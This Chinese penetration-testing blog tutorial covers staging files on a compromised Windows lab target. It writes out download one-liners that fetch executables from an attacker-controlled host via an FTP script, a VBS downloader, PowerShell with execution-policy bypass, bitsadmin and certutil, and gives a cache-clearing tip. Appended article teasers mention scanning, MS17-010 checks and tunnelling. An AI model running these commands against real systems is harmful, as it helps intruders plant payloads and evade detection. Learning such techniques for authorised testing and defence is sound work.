windows靶机_【内网渗透】Windows下的内网传输技术

最新推荐文章于 2025-09-16 10:45:12 发布
原创 最新推荐文章于 2025-09-16 10:45:12 发布 · 482 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows靶机

本文介绍了在无法上传shell但可命令执行的Windows环境中,如何利用FTP、VBS、Powershell、bitsadmin和certutil进行文件的上传与下载。详细讲解了各种方法的实现步骤和技巧,包括FTP的匿名访问、VBS的msxml12.xmlhttp和adodb.stream对象、Powershell的命令行下载以及bitsadmin和certutil的使用。
a663f700d22c66a97d25d127411d2b65.png点击上方“公众号” 可以订阅哦!

Hello,各位小伙伴大家好~4e0e09bb8eb071083701685458ca99c6.png4e0e09bb8eb071083701685458ca99c6.png

bd367fc22bdfbac0c64e88f08674b863.png

掐指一算,好像已经一个月没更新过了...

bd90f1162743e32b393be1c24e2d40cb.png

趁着现在不忙(才不是偷懒)赶紧更新一波~

605c4781ba2181a237ce4f806be26ddc.png

今天给大家分享的内容是Windows内网传输技术:

有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。

一起来看看吧!

ba977443f687c0c93b7905792f112dbf.png

Part.1

FTP

FTP环境部署

首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。

我们可以在本地服务器先搭建一个ftp服务器,如3CDaemon:

fe86777f2d209dd7680d0a1f66b5b589.png

创建一个用户monster/a123456:

471b4b7911a8d35720d9d660d1c07bde.png

靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。

ee2f624ce341bb1e1922249a78833232.gif

上传与下载

ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中。

例如需要下载一个hello.txt到靶机中:

7a0ba9b39393559e52476b9578a37e4f.png

写入后,靶机中会生成一个ftp.txt文件:

e1bbd41cb4b5e53fe8f1e0d6289cedd5.png

通过命令行执行该文件:

a4ee5908ede5fff2bfae9dae407b78db.png

可以看到hello.txt文件被下载到靶机:

8e38ef22fd27ec9e2c4587c903c44227.png

以上操作可以简化为:

Echo open 192.168.3.1 > o&echo user monster a123456 >> o &echo get hello.txt >> o &echo quit >> o &ftp -n -s:o &del /F /Q o
594a385e238637bae450fad2f2ed25c4.png

如果ftp允许匿名账号登陆,还可简化为:

Echo open 192.168.3.1 > o &echo get hello.txt >> o &echo quit >> o &ftp -A -n -s:o &del /F /Q o
b9ff8315bbf8020e45956bf6e23403ce.png

//-A 匿名访问

如果是上传文件到ftp服务器,则使用put:

a34ba8ec43fb917d84654851864618eb.png

可以在ftp服务器中找到上传的文件:

7baa5fab9a3574fd91d30063fd3f690d.pngba977443f687c0c93b7905792f112dbf.png

Part.2

VBS

VBS

VBS是windows中基于Visual Basic的脚本语言。

利用VBS上传,主要使用的是msxm12.xmlhttp和adodb.stream对象。

首先在本地开启http服务,提供文件下载:

0ada80675efaf2140b14121128095284.png

通过shell向靶机写入VBS代码:

5c3ec1788e9c09b0bc01cfdad3d39fc3.png

详细代码如下:

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbsecho Set Shell = CreateObject("Wscript.Shell") >>download.vbsecho Post.Open "GET","http://192.168.3.1/target.exe",0 >>download.vbsecho Post.Send() >>download.vbsecho Set aGet = CreateObject("ADODB.Stream") >>download.vbsecho aGet.Mode = 3 >>download.vbsecho aGet.Type = 1 >>download.vbsecho aGet.Open() >>download.vbsecho aGet.Write(Post.responseBody) >>download.vbsecho aGet.SaveToFile " C:/Users/Monster/Desktop/target.exe",2 >>download.vbs

此处靶机中会生成download.vbs,执行:

Cscript download.vbs
6cfbf7f0f43b7ffcb6554ad71a1561fd.png

//成功“上传”文件至靶机。

方法二:VBS一句话下载

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs cscript downfile.vbs http://192.168.3.1/target.exe C:/Users/Monster/Desktop/target2.exe
e07eb3a36474bcbfb13a41d47e5af14a.pngba977443f687c0c93b7905792f112dbf.png

Part.3

Powershell

Powershell

Powershell在windows server 2003以后版本的操作系统中默认是自带的,我们也可以用它来进行文件下载。

powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.3.1/hash.exe','C:/Users/Monster/Desktop/hash.exe');

c058149095207fd410ab919145beac1e.png

//注意区分中逗号等英文字符。

ba977443f687c0c93b7905792f112dbf.png

Part.4

bitsadmin

bitsadmin

除了脚本以外,windows还有自带的两个工具:bitsadmin和certutil。

Bitsadmin是一个命令行工具,Windows xp以后的版本中自带该工具,例如Windows Update程序就依靠它来下载文件,因此我们也可以进行利用。

bitsadmin /transfer 123 http://192.168.3.1/hello.txt C:\Users\Monster\Desktop\hello.txt

//123为任务号

3cfa7e17b9e4db8b969cf96f240de355.png

注:经测试这种方法进行下载比其他方法慢很多。

保存路径不能写成C:/Users/Monster/Desktop/hello.txt,否则会报错:

7a98c331b97bab712908ad7abaf294fa.pngba977443f687c0c93b7905792f112dbf.png

Part.5

certutil

certutil

Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书,CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。

certutil -urlcache -split -f http://192.168.3.1/hash.exe
45c74660c5f4149a2160d2f93d52388d.png

但是这种下载方法默认会留下缓存,下载完成后通过delete参数清除缓存:

116c0bbbd978eabd474b422e02523bf9.pngba977443f687c0c93b7905792f112dbf.png

Part.6

结语

好啦,以上就是今天的全部内容了~

f51361e9cb6e75377629208f8dfdbe85.png

如果有问题,欢迎到公众号一名白帽的成长史留言~

Peace!d56f992e3cf7d86dbcea467bd45750d4.png

1e00414b497bc1e786cc3f8b9c62d8c3.png

你“在看”我吗?

bfcdfd74f6f82468eef75922be88e86b.png
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2850
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
红队内网攻防渗透内网渗透内网对抗:Windows权限提升篇&溢出漏洞&土豆家族&通杀全系&补丁对比&EXP筛选
HACKONE的博客
05-30 289
红队内网攻防渗透1. 内网权限提升技术1.1 windows内网权限提升技术--手工篇 1. 内网权限提升技术 1.1 windows内网权限提升技术–手工篇
HTB靶场系列 Windows靶机 Blue靶机
m0_57221101的博客
01-26 1609
ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限 勘探 常规操作 先用nmap扫 nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT Warning: 10.10.10.40 giving up on por
CFS三层靶机-内网渗透
最新发布
bdfcfff77fa的博客
09-16 1013
链接:https://pan.baidu.com/s/1-4H17E9pGz5EbnFgQp-ZEw?pwd=bull提取码:bull。
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1598
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机(官方原版镜像)
05-08
本人学习时使用的的这两个系统,常见的高风险漏洞较多,容易利用,适合新手练习。 metasploitable-linux为常用的Linux靶机,系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务,是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了,都被人挖烂了,sp2版本相比sp3更简单一些,适合新手练习。
HTB靶场系列 Windows靶机 Legacy靶机
程序员阿飘 的博客
01-10 577
本文已参与「新人创作礼」活动,一起开启掘金创作之路。
内网渗透windows
qq_63980959的博客
04-05 3702
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
内网渗透Windows下的内网传输技术
wo41ge的博客
12-18 676
前言 有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。 ftp 环境部署 首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。 我们可以在本地服务器先搭建一个ftp服务器 创建一个用户 靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。 上传和下载 ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中 echo open ip >>ftp.txt
内网渗透-必须掌握的代理与隧道技术解答
告白的博客
10-09 5386
0x00 内网渗透为什么使用代理与隧道技术 简单的来讲,当拿到某网络主机的权限,发现无法将流量或者权限发送出来,对渗透造成了很大的影响,所以内网渗透必须需要了解到两个技术知识,代理与隧道技术。 1)代理解决的问题:代理简单来讲解决网络之间的通信问题,如内网与外网之间或者两者自己之间的通信,两个不同内网的通信就必须借助到代理,否则无法通讯。 2)隧道技术:简单来讲就是解决流量无法发送,隧道技术多用来绕过一些安全设备的监控,如防火墙,流量监控设备对我们发送的流量进行了拦截,这个时候需要接触隧道技术绕过拦截,隧道
内网渗透----windows信息收集整理
浅笑996的博客
04-14 1071
一、基础信息收集 1.信息收集类型 操作系统版本、内核、架构 是否在虚拟化环境中,已安装的程序、补丁 网络配置及连接 防火墙设置 用户信息、历史纪录(浏览器、登陆密码) 共享信息、敏感文件、缓存信息、服务等 2.系统信息 systeminfo 功能:心事有关计算机及其操作系统的详细配置,包括操作系统配置,安全信息,产品ID和硬件属性(如RAM,磁盘空间和网卡) Egg systeminfo ...
(菜鸟自学)搭建虚拟渗透实验室——安装Windows 7 靶机
nbdlsplyb的博客
01-14 4493
依次点击“开始”》“控制面板”》“网络和Internet”》“网络和共享中心”》“更改适配器设置”》右击“本地连接”,单击属性》点击“IPv4”》配置相应的IP地址、掩码、网关。点击“下一步”》勾选“我接受许可条款”,点击“下一步”》点击“自定义”,随即点击“下一步”,将开始进行安装,此过程缓慢,请耐心等待,待安装完毕系统将自动进行重启。加载VMware Tools的安装程序,运行该安装程序并选用“典型安装”,安装完成将会提示重启,重启之后将生效。新建一台虚拟机,并选择Windows 7系统。
Windows环境中搭建不同靶机
weixin_51240556的博客
10-03 1839
Windows环境中搭建不同靶机 实验环境: VMware Workstation 实验器材: Windows2008或者windows2016 .XAMPP 一.搭建靶机DVWA如下图: 1.编辑 c:\xampp\apache\conf\httpd.conf: 在这里插入图片描述在这里插入图片描述在这里插入图片描述 2.复制 DVWA-master 源码到 C:\xampp\htdocs重命名为dvwa并解压,要保证网站文件在 C:\xampp\htdocs\dvwa 下 在这里插入图片描述3.重启
TryHackMe:Relevant(Windows靶机渗透
Mysmycbx的博客
04-04 520
几个月前出现了一个新的漏洞,叫做Printspoofer,它利用了Windows中的一个漏洞,其中某些服务帐户需要使用SeImpersonate特权以更高的权限运行。使用SMB共享,我们可以将Printspoofer漏洞上传到计算机,导航到C:/inetpub/wwwroot/nt4wrksv目录,并定位它。在80端口没有发现内容,但是在49663端口发现了一个目录,如图。通过扫描服务,发现了web服务80端口和49663端口,smb的445端口和rdp的3389端口。
web渗透---windows内网渗透
jklbnm12的博客
09-19 1422
不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。 内网渗透思路 本次内网渗透的思路为:通过信息收集对网站进行分析,通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后门木马或者后门软件,实现长期控制和获得敏感数据的方式。 还有一种内网渗透的思路为:通过社工等方法攻击企业办公网的电脑、办公网无线等,实现控制办公电脑,再用获得的办公网数据。 渗透
内网渗透--windows
weixin_44940180的博客
08-18 376
windows基础命令 添加管理员用户,设置密码为123456 net user cly 123456 /add net localgroup administrators cly /add 如果远程桌面连接不上,那么可以添加远程桌面组 net localgroup "Remote Desktop Users" cly /add
内网渗透靶机-VulnStack 2
weixin_44368248的博客
02-21 5215
目录 内网渗透靶机-VulnStack 2 主机发现 端口扫描 192.168.111.128 192.168.111.201 漏洞利用 内网信息收集 ipconfig /all Tasklist shell net group "domain users" /domain shell net group “domain admins” /domain shell net group “domain computers” /domain shell net group “domai
内网渗透怎么获取靶机ip地址
06-19
### 内网渗透测试中获取靶机IP地址的方法与工具 在内网渗透测试中,获取靶机的IP地址是关键的第一步。以下是几种常见的方法和工具: #### 方法一:Ping 扫描 通过循环 Ping 的方式可以快速发现存活的 IP 地址。例如,使用 Windows 系统下的命令行工具执行以下脚本: ```cmd for /l %i in (1,1,255) do @ ping 192.168.100.%i -w 1 -n 1 | find /i "ttl=" ``` 此脚本会遍历指定网段内的所有 IP 地址,并输出存活主机的信息[^2]。 #### 方法二:Nmap 扫描 Nmap 是一种强大的网络扫描工具,能够高效地发现网络中的存活主机。例如,以下命令可以扫描指定网段内的所有 IP 地址: ```bash nmap -sn 192.168.100.0/24 ``` `-sn` 参数表示仅进行主机发现,而不尝试端口扫描或服务检测。该命令将返回所有存活主机的 IP 地址列表。 #### 方法三:Nbtscan 工具 Nbtscan 是专门用于扫描局域网中 NetBIOS 名称和服务的工具。它不仅可以发现存活主机,还可以提供目标主机所属的域名信息。例如: ```bash nbtscan 192.168.100.0/24 ``` 此工具特别适合于需要了解目标主机详细信息的场景[^2]。 #### 方法四:MS17-010 漏洞扫描 如果目标网络可能存在 MS17-010 漏洞,可以利用 Metasploit 框架进行扫描。例如: ```ruby use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.100.0/24 exploit ``` 上述命令将扫描指定网段内的所有主机,检查是否存在 MS17-010 漏洞。一旦发现漏洞主机,即可获取其 IP 地址[^4]。 #### 方法五:Neo-reGeorg 隧道工具 在某些情况下,可能需要通过 Web 应用程序建立反向隧道以访问内网资源。Neo-reGeorg 是一个常用的加密隧道工具,支持自定义密钥和端口。例如: ```python python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx ``` 通过该工具,可以间接获取内网靶机的 IP 地址信息[^3]。 ### 注意事项 在实际操作中,确保遵守相关法律法规及授权范围,避免对非授权目标进行扫描或攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值